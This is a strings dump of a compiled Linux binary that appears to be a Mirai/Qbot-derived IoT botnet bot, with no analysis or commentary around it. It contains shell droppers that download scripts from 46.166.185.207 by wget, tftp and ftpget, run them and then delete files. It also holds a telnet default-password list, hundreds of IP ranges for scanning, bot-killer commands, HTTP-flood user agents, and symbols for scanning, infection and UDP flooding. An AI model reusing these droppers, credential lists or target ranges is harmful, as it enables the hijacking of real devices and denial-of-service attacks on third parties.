PTRhD
[^_]
VUUU
[^_]
<suM
<duJ
<xuJ
<XuJ
<uuG
<cuT
<[^_]
[^_]
WVSQ
PRQW
T$(S
T$(S
UWVS
^8QSh#h
D$(P
D$(P
[^_]
RPhc
t$(j
UWVS
[^_]
UWVS
<rt><w
t7<af
E4tmPhL
t$(V
[^_]
UWVS
[^_]
QPRS
^8PSh#h
t$,V
t$$S
[^_]
UWVS
T$`~
L$,1
D$(%
WVPR
$VRP
?0u,
VVhb3
D$ P
PRQQ
[^_]
tR~P
tB~@=
UWVS
<$u0
\$L9
~	<mtN
:*u4
L$pE
D$`P
T$\)
\[^_]
D$ P
Z %0
D$ P
^8PSh#h
[^_]
UWVS
[^_]
UWVS
D$gP
[^_]
UWVS
Z[^_]
\$HPh
D$)P
RVSh
D$ P
D$$Ph
UWVS
t$xSU
t$xj
t$hW
\$DS
T$@XZ
D$TPh
E$RWP
uZRj
t$,U
L[^_]
D$ Pj
D$ Pj
xAPPSh
UWVS
\$Thp
D$8P
;-08
T$ ~
#t$ 
2#D$ 
D$8P
[^_]
UWVS
\$4u
;5,8
t$8R
$9D$
t$8S
\$0PPj
[^_]
[^_]
UWVS
u=9J
;X,tQ
[^_]
UWVS
u<9J
;5,8
SSPQ)
[^_]
uXRh
\$ S
D$,Ph
UWVS
[^_]
UWVS
G;<$|
XZKy
[^_]
UWVS
[^_]
D$ [Xj
}/QQ
uJQQj
t$@hh
D$4j
ET$,
UWVS
 <xu
(<`v
}/C9
D$, D$
t$$h`
u%WWSS
ZYSS
[^_]
yPPj
PPSh
UWVS
D$ P
t@;D$xu
D$ P
t$Dj
D$<PR
t$(j
UWVS
[^_]
UWVS
)\$(
[^_]
UWVS
wcQWUR
[^_]
[^_]
UWVS
[^_]
UWVS
u'z%
u?z=
D$Pp
l$61
D$(RP
D$'g
D$'f
\$'t
D$\p
|$d|4
|$'ftt
T$H~@
[^_]
AIt	
QQWS
'RRWS
UWVS
.u5A
Z[^_]
UWVS
D$7hH7
T$8XZj
\$PS
D$$;
}3Ph
t$(j
D$$f
D$LPU
D$89
uOQh
XZKj
9\$$}
PCPVU
;\$d|
D$tP
T$|RW
G$;G wn
9D$xu,
t$4C;\$h}
T$<^_
uDQh
XZKj
9\$$}
D$(@
T$(u
tMQhH7
T$8f
[^_]
UWVS
t>QQh
\$$S
[^_]
t$4j
t$8j
UWVS
T$$v
^8PSh#h
D$(PV
x:RW
D$(PV
[^_]
^8QSh#h
UWVS
[^_]
PVWS
t+F1
D$ PU
[^_]
UWVS
D$(P
yQGQVh
u+Rj
D$$P
,[^_]
UWV1
D$+1
|<+0u&
D<+t)
|$7W
<[^_]
UWVS
Pj j
D$HP
;D$|v
!WWR
[^_]
UWVS
[^_]
UWVS
D$0t 
PPj#
u,PP
t$4U
[^_]
UWVS1
YRRj.W
D$()
[^_]
UWVS
G;|$,
s^PS
[^_]
46.166.185.207
cd /tmp || cd /var; wget http://46.166.185.207/fyfa.sh; chmod 777 fyfa.sh; sh fyfa.sh; tftp 46.166.185.207 -c get tfyfa.sh; chmod 777 tfyfa.sh; sh tfyfa.sh; tftp -r tfyfa2.sh -g 46.166.185.207; chmod 777 tfyfa2.sh; sh tfyfa2.sh; ftpget -v -u anonymous -p anonymous -P 21 46.166.185.207 tfyfa1.sh tfyfa1.sh; sh tfyfa1.sh; rm -rf fyfa.sh tfyfa.sh tfyfa2.sh tfyfa1.sh; rm -rf *
asDSFdfFS#%%#@$@^&$*F23423DSFSDFASDAS12312412433252345#@$@#%
/proc/net/route
	00000000	
Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)
Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10
Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
close
keep-alive
accept
%s %s HTTP/1.1
Connection: %s
Accept: */*
User-Agent: %s
/usr/bin/python
server
device
/usr/bin/wget
wget
/usr/bin/tftp
tftp
curl
/tmp/dvrHelper
infected by mirai
/tmp/bins.sh
infected_by_qbot
device_not_infected
jackmy*
busybox*
bin*
sex*
tftp*
arm*
mipsel*
mips*
mips64*
i686*
sparc*
sh4*
bot*
jackmeoff*
hackz*
bruv*
armv*
ntpd*
shitty*
jack*
ssh*
mips
mipsel
i686
i586
/dev/netslink/
/tmp/
/var/
/dev/
/var/run/
/dev/shm/
/mnt/
/boot/
/usr/
>%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve ;echo ps aux >> proc ; pkill -9 %d
>%s.t && cd %s ; >retrieve
pkill -9 %s;pkill -9 %s
cd /tmp; wget http://46.166.185.207/fyfa.sh; curl -O http://46.166.185.207/fyfa.sh; chmod 777 fyfa.sh; sh fyfa.sh; tftp 46.166.185.207 -c get tfyfa.sh; chmod 777 tfyfa.sh; sh tfyfa.sh; tftp -r tfyfa2.sh -g 46.166.185.207; chmod 777 tfyfa2.sh; sh tfyfa2.sh; ftpget -v -u anonymous -p anonymous -P 21 46.166.185.207 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf fyfa.sh tfyfa.sh tfyfa2.sh ftp1.sh; rm -rf */r/n/r/n/r/n
(null)
telnet
root
admin
1234
123456
vnpt
1234567890
support
antslq
zyad1234
anko
tini
letacla
xmhdipc
default
12345
7ujmko0admin
supervisor
guest
gethostbyname
setsockopt
connect
1024
GET /e.fyfa.mips 
/tmp/hacka
GET /e.fyfa.mpsl 
/tmp/hacka2
GET /e.fyfa.sh4 
/tmp/hacka3
GET /e.fyfa.arm 
/tmp/hacka4
GET /e.fyfa.pcc 
/tmp/hacka5
GET /e.fyfa.spc 
/tmp/hacka6
user
ogin
name
pass
dvrdvs
mdm9625
9615-cdp
F600
F660
F609
nvalid
ailed
ncorrect
enied
rror
oodbye
busybox
shell
%d.%d.%d.%d
112.5.%d.%d
117.165.%d.%d
85.3.%d.%d
41.252.%d.%d
104.55.%d.%d
78.186.%d.%d
78.189.%d.%d
221.120.%d.%d
88.5.%d.%d
41.254.%d.%d
103.20.%d.%d
103.47.%d.%d
103.57.%d.%d
45.117.%d.%d
101.51.%d.%d
137.59.%d.%d
14.204.%d.%d
27.50.%d.%d
27.54.%d.%d
27.98.%d.%d
36.32.%d.%d
36.248.%d.%d
39.64.%d.%d
43.253.%d.%d
43.230.%d.%d
163.53.%d.%d
43.245.%d.%d
123.25.%d.%d
103.54.%d.%d
27.255.%d.%d
103.204.%d.%d
123.24.%d.%d
113.191.%d.%d
113.188.%d.%d
113.189.%d.%d
Do nine men interpret Nine men I nod
14.160.%d.%d
14.161.%d.%d
14.162.%d.%d
14.163.%d.%d
14.164.%d.%d
14.165.%d.%d
14.166.%d.%d
14.167.%d.%d
14.168.%d.%d
14.169.%d.%d
14.170.%d.%d
14.171.%d.%d
14.172.%d.%d
14.173.%d.%d
14.174.%d.%d
14.175.%d.%d
14.176.%d.%d
14.177.%d.%d
14.178.%d.%d
14.179.%d.%d
14.180.%d.%d
14.181.%d.%d
14.182.%d.%d
14.183.%d.%d
14.184.%d.%d
14.185.%d.%d
14.186.%d.%d
14.187.%d.%d
14.188.%d.%d
14.189.%d.%d
14.190.%d.%d
14.191.%d.%d
45.121.%d.%d
45.120.%d.%d
45.115.%d.%d
43.252.%d.%d
43.240.%d.%d
41.174.%d.%d
45.127.%d.%d
103.30.%d.%d
123.16.%d.%d
202.44.%d.%d
116.93.%d.%d
41.253.%d.%d
117.173.%d.%d
113.190.%d.%d
112.196.%d.%d
113.178.%d.%d
112.45.%d.%d
183.223.%d.%d
116.71.%d.%d
103.44.%d.%d
110.235.%d.%d
124.253.%d.%d
211.237.%d.%d
117.175.%d.%d
111.9.%d.%d
222.252.%d.%d
113.174.%d.%d
113.160.%d.%d
113.161.%d.%d
113.162.%d.%d
113.163.%d.%d
113.164.%d.%d
113.165.%d.%d
113.166.%d.%d
113.167.%d.%d
113.168.%d.%d
113.169.%d.%d
123.17.%d.%d
123.21.%d.%d
123.22.%d.%d
222.253.%d.%d
222.254.%d.%d
222.255.%d.%d
41.208.%d.%d
103.198.%d.%d
88.248.%d.%d
88.105.%d.%d
88.247.%d.%d
85.105.%d.%d
188.3.%d.%d
103.203.%d.%d
103.55.%d.%d
103.220.%d.%d
183.233.%d.%d
103.242.%d.%d
103.14.%d.%d
103.195.%d.%d
103.214.%d.%d
103.218.%d.%d
103.225.%d.%d
103.228.%d.%d
103.231.%d.%d
103.60.%d.%d
103.248.%d.%d
103.253.%d.%d
103.255.%d.%d
113.176.%d.%d
113.175.%d.%d
203.134.%d.%d
203.210.%d.%d
117.176.%d.%d
117.171.%d.%d
117.162.%d.%d
203.150.%d.%d
157.119.%d.%d
43.228.%d.%d
162.12.%d.%d
115.220.%d.%d
125.114.%d.%d
37.158.%d.%d
95.9.%d.%d
58.71.%d.%d
1.56.%d.%d
1.188.%d.%d
27.0.%d.%d
27.8.%d.%d
27.112.%d.%d
27.192.%d.%d
42.4.%d.%d
42.48.%d.%d
42.52.%d.%d
42.56.%d.%d
42.63.%d.%d
42.84.%d.%d
42.176.%d.%d
42.224.%d.%d
60.0.%d.%d
60.16.%d.%d
62.30.%d.%d
62.252.%d.%d
62.254.%d.%d
62.255.%d.%d
77.96.%d.%d
77.97.%d.%d
77.98.%d.%d
77.100.%d.%d
77.102.%d.%d
81.100.%d.%d
94.174.%d.%d
49.118.%d.%d
78.188.%d.%d
14.33.%d.%d
91.83.%d.%d
146.88.%d.%d
183.71.%d.%d
192.168.%d.%d
89.71.%d.%d
244.77.%d.%d
179.105.%d.%d
125.27.%d.%d
189.29.%d.%d
189.35.%d.%d
189.4.%d.%d
101.105.%d.%d
119.157.%d.%d
119.150.%d.%d
119.151.%d.%d
119.152.%d.%d
119.153.%d.%d
119.154.%d.%d
119.155.%d.%d
119.156.%d.%d
119.158.%d.%d
119.159.%d.%d
191.24.%d.%d
187.119.%d.%d
177.215.%d.%d
152.241.%d.%d
182.185.%d.%d
179.80.%d.%d
179.81.%d.%d
179.82.%d.%d
179.83.%d.%d
179.84.%d.%d
179.86.%d.%d
179.87.%d.%d
179.88.%d.%d
179.89.%d.%d
179.90.%d.%d
179.91.%d.%d
179.92.%d.%d
179.93.%d.%d
179.94.%d.%d
179.95.%d.%d
179.96.%d.%d
179.97.%d.%d
179.98.%d.%d
179.99.%d.%d
152.240.%d.%d
152.242.%d.%d
152.243.%d.%d
152.244.%d.%d
152.245.%d.%d
152.246.%d.%d
152.247.%d.%d
152.248.%d.%d
152.249.%d.%d
182.189.%d.%d
182.190.%d.%d
182.191.%d.%d
182.188.%d.%d
182.187.%d.%d
182.186.%d.%d
182.184.%d.%d
179.100.%d.%d
179.101.%d.%d
179.102.%d.%d
179.103.%d.%d
179.110.%d.%d
179.111.%d.%d
179.112.%d.%d
179.113.%d.%d
179.114.%d.%d
179.115.%d.%d
179.116.%d.%d
179.117.%d.%d
191.193.%d.%d
191.194.%d.%d
191.195.%d.%d
191.196.%d.%d
191.197.%d.%d
191.198.%d.%d
152.250.%d.%d
152.251.%d.%d
152.252.%d.%d
152.253.%d.%d
152.254.%d.%d
152.255.%d.%d
177.112.%d.%d
177.113.%d.%d
177.114.%d.%d
177.115.%d.%d
177.116.%d.%d
177.117.%d.%d
177.118.%d.%d
177.119.%d.%d
177.120.%d.%d
177.121.%d.%d
177.138.%d.%d
177.139.%d.%d
177.144.%d.%d
177.145.%d.%d
177.146.%d.%d
177.147.%d.%d
177.160.%d.%d
177.161.%d.%d
177.162.%d.%d
177.163.%d.%d
177.168.%d.%d
177.169.%d.%d
177.170.%d.%d
177.171.%d.%d
177.172.%d.%d
189.96.%d.%d
189.97.%d.%d
189.98.%d.%d
189.99.%d.%d
39.34.%d.%d
59.103.%d.%d
191.12.%d.%d
186.117.%d.%d
179.131.%d.%d
179.129.%d.%d
179.170.%d.%d
191.206.%d.%d
187.118.%d.%d
187.116.%d.%d
179.224.%d.%d
179.166.%d.%d
[0;%s[%s:%s:%s]
cat | sh
oelinux123
cd /tmp;chmod +x *;./hacka;./hacka2;./hacka3;./hacka4;./hacka;./hacka6;rm -rf hacka*
HTML
[0;%s[killer-constantly_botkilling_devices]
SCAN
[0;%s[scanner_started]
[0;%s[CONNECTION:%s:%s:%s:%s]
%s%s%m
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Beeb
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
%s%s%s
Error 0
Unknown host
Host name lookup failure
Unknown server error
No address associated with name
Resolver error
/bin/sh
/dev/null
L(knN
 Ainf
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
0123456789abcdef
/etc/hosts
/etc/config/hosts
CAk[S
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
A Santa lives evil at NASA
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
Borrow or rob
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.got.plt
.data
.bss
.comment
libc/sysdeps/linux/i386/crti.S
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.2429
p.2427
__do_global_dtors_aux
object.2482
frame_dummy
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
initfini.c
libc/sysdeps/linux/i386/crtn.S
libc/sysdeps/linux/i386/crt1.S
bot.c
resolv_skip_name
i.5431
C.69.5759
C.68.5758
C.67.5757
printchar
prints
printi
print
HackerScan2
fdopen_pids
__syscall_fcntl.c
__syscall_fcntl64.c
_exit.c
access.c
chdir.c
close.c
fork.c
getpid.c
getppid.c
ioctl.c
kill.c
open.c
prctl.c
read.c
select.c
setsid.c
time.c
waitpid.c
write.c
toupper.c
__C_ctype_b.c
__C_ctype_toupper.c
__errno_location.c
clock.c
fclose.c
fopen.c
perror.c
fprintf.c
snprintf.c
sprintf.c
vsnprintf.c
_fopen.c
_stdio.c
_stdio_streams
__stdio_mutex_initializer.4160
_fixed_buffers
_wcommit.c
vfprintf.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
spec_base.4370
prefix.4371
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
spec_flags.4372
qual_chars.4377
spec_chars.4373
spec_ranges.4374
spec_or_mask.4375
spec_and_mask.4376
fflush_unlocked.c
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
memset.c
strchr.c
strcpy.c
strlen.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1330
_string_syserrmsgs.c
bcopy.c
strcasestr.c
strtok.c
Degas are we not drawn onward no In union drawn onward to new eras aged
next_start.1278
isatty.c
tcgetattr.c
ntohl.c
herror.c
error_msg
h_errlist
colon_space.2931
inet_ntoa.c
buf.2827
inet_makeaddr.c
gethostbyname.c
buf.5162
h.5161
gethostbyname_r.c
connect.c
getsockname.c
getsockopt.c
recv.c
recvfrom.c
send.c
sendto.c
setsockopt.c
shutdown.c
socket.c
signal.c
sigsetops.c
malloc.c
__malloc_largebin_index
calloc.c
realloc.c
free.c
__malloc_trim
abort.c
mylock
been_there_done_that
rand.c
random.c
unsafe_state
randtbl
Tacocat
random_r.c
random_poly_info
system.c
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sleep.c
sysconf.c
__uClibc_main.c
__pthread_return_0
__pthread_return_void
__check_one_fd
been_there_done_that.3001
sigaction.c
__restore_rt
__restore
libc/sysdeps/linux/i386/vfork.S
libc/sysdeps/linux/i386/mmap.S
__socketcall.c
__syscall_rt_sigaction.c
clock_getres.c
execve.c
getdtablesize.c
getegid.c
geteuid.c
getgid.c
getpagesize.c
getrlimit.c
getuid.c
mremap.c
munmap.c
nanosleep.c
sbrk.c
sigprocmask.c
times.c
wait4.c
__C_ctype_tolower.c
errno.c
__h_errno_location.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
_WRITE.c
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
memchr.c
memmove.c
strncpy.c
mempcpy.c
memrchr.c
strtok_r.c
strpbrk.c
inet_aton.c
dnslookup.c
static_ns
static_id
opennameservers.c
God A red nugget A fat egg under a dog
get_hosts_byname_r.c
raise.c
dl-support.c
brk.c
__syscall_error.c
poll.c
fseeko.c
fseeko64.c
_adjust_pos.c
_cs_funcs.c
fgets.c
fgets_unlocked.c
strcmp.c
strncat.c
rawmemchr.c
strspn.c
strdup.c
ntop.c
inet_pton4
xdigits.3285
inet_ntop4
encodeh.c
decodeh.c
encodeq.c
lengthq.c
decodea.c
read_etc_hosts_r.c
llseek.c
tolower.c
fgetc_unlocked.c
strcasecmp.c
encoded.c
decoded.c
lengthd.c
_READ.c
_rfill.c
_trans2r.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
_GLOBAL_OFFSET_TABLE_
__init_array_start
__preinit_array_start
__read_etc_hosts_r
gtstate
__GI_execve
__libc_sigaction
strcpy
__GI_fcntl64
recvLine
__socketcall
__GI___ctype_b
__GI_memchr
__GI___glibc_strerror_r
waitpid
__open_nameservers
__GI_fopen
getrlimit
ioctl
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI___C_ctype_toupper_data
__GI_time
getgid
sysconf
stdout
random
__GI_strdup
__GI_getpagesize
getdtablesize
__GI_h_errno
contains_fail
__length_question
__GI___ctype_toupper
__GI_strcasecmp
__GI_tolower
recv
connect
__encode_question
__GI___uClibc_fini
numpids
__encode_header
__GI_strncat
__pthread_mutex_lock
__sigdelset
__GI_clock_getres
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_snprintf
__GI_vsnprintf
__GI_setsid
memmove
__bsd_signal
snprintf
__GI_strpbrk
__stdio_trans2r_o
munmap
__GI_setsockopt
__libc_stack_end
__GI_fclose
__GI_wcsnrtombs
_uintmaxtostr
__libc_fcntl
atol
_h_errno
getc_unlocked
times
cfyfa
__ctype_b
__GI_random_r
usernames
resolv_domain_to_hostname
errno
getegid
read_until_response
__GI_sbrk
zprintf
__GI___uClibc_init
execve
getpagesize
getpid
__GI_lseek64
setstate_r
fgets
getHost
__libc_getpid
HackerScan1
__xpg_strerror_r
fcntl64
prctl
memcpy
makeRandomStr
getRandomIP
__GI_fputs_unlocked
execl
__GI_fgets
perror
colorCodes
creat
rand_init
_stdio_openlist_dec_use
sclose
__libc_select
_ppfs_init
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
trim
Eleele
__GI_fgets_unlocked
__pthread_mutex_init
tolower
getuid
system
__open_etc_hosts
malloc
isatty
get_request
listen_server
sleep
__GI_atol
vsnprintf
__dns_lookup
__GI_read
recvfrom
__C_ctype_tolower
random_r
__dso_handle
clock_getres
gethostbyname_r
reset_telstate
socket
select
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
__GI_memset
__stdio_seek
mempcpy
__GI_strcoll
__GI_write
__ctype_toupper
__libc_read
_string_syserrmsgs
__GI_herror
__GI_open
__GI_strchr
__searchdomain
__GI_tcgetattr
__environ
mmap
wcsnrtombs
scan
makeIPPacket
__GI_inet_ntoa
send
__fgetc_unlocked
abort
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
__GI_getgid
srandom_r
_init
__GI_inet_ntoa_r
__GI_setstate_r
strtol
__libc_lseek64
strnlen
rawmemchr
__GI_mempcpy
intcon
__malloc_state
__GI___C_ctype_b_data
resolv_lookup
getBuilds
wgettftpecho
__sigaddset
nanosleep
__GI_send
h_errno
calloc
__pthread_mutex_unlock
wait4
__register_frame_info_bases
__GI_exit
__app_fini
csum
__exit_cleanup
__GI_execl
__GI_srandom_r
__GI___ctype_tolower
write
environ
__GI_close
fprintf
__resolv_lock
kill
fputs_unlocked
__pthread_mutex_trylock
__GI_brk
__GI_nanosleep
__GI_strtok
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
__GI_fseek
ourIP
util_strlen
chdir
util_zero
fseeko
_stdio_openlist_del_count
connectTimeout
__raise
setsockopt
bsd_signal
__GI_times
fseek
alula
mremap
__GI_kill
__GI_strcmp
__GI_memmove
sendSTD
setstate
__decode_dotted
__stdio_READ
memchr
__GI_toupper
__pthread_initialize_minimal
__GI_recv
__stdin
stdin
__GI_isatty
strcasestr
_start
__deregister_frame_info_bases
strstr
__GI_ioctl
init_rand
rand
signal
read
__decode_header
__GI___h_errno_location
__GI_memcpy
strcoll
wcsrtombs
_stdio_user_locking
strncpy
strcasecmp
htonl
sendto
__C_ctype_toupper
__GI___C_ctype_b
realloc
__GI_gethostbyname_r
__GI_strncpy
__libc_send
__GI___xpg_strerror_r
currentServer
__GI___C_ctype_tolower
__GI_recvfrom
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
__stdio_adjust_position
malloc_trim
__GI_poll
_vfprintf_internal
__GI_strcasestr
fork
rand_next
HtmlAttack
__stdio_rfill
strncat
gotIP
__GI_sleep
sigaction
__GI_gethostbyname
_dl_phdr
__GI_getc_unlocked
__GI___libc_fcntl64
__uClibc_init
__GI_munmap
_store_inttype
__length_dotted
__getpagesize
__GI_random
__GI_mremap
__syscall_error
__uclibc_progname
__GI_getegid
__GI_wait4
__malloc_lock
__uClibc_main
sbrk
__rtld_fini
__GI_fork
strdup
__libc_close
__GI_getpid
inet_aton
index
_pthread_cleanup_push_defer
processCmd
__sigismember
fopen
__bss_start
__libc_open
getOurIP
resolv_entries_free
memset
__GI_socket
main
__glibc_strerror_r
listFork
__GI___C_ctype_tolower_data
killPid
__stdio_fwrite
negotiate
srand
initstate
fclose
__syscall_rt_sigaction
ntohs
inet_ntoa
sendUDP
getppid
tcgetattr
__C_ctype_tolower_data
pfyfa
__libc_recvfrom
time
__libc_system
__GI_abort
poll
__GI_fprintf
__get_hosts_byname_r
__stdio_init_mutex
__GI__exit
botkiller
herror
strcmp
infected
shutdown
advances2
__nameserver
data_start
__GI_sysconf
infect
__h_errno_location
__C_ctype_b_data
__GI_inet_pton
gethostbyname
_stdio_fopen
advance_state
_fini
__GI_chdir
__vfork
__GI_mmap
contains_success
sprintf
fdgets
__get_pc_thunk_bx
strerror_r
__GI_select
__libc_waitpid
socket_connect
